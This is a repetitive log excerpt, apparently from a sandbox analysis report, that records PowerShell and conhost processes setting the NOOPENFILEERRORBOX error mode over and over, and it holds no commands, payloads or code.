Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
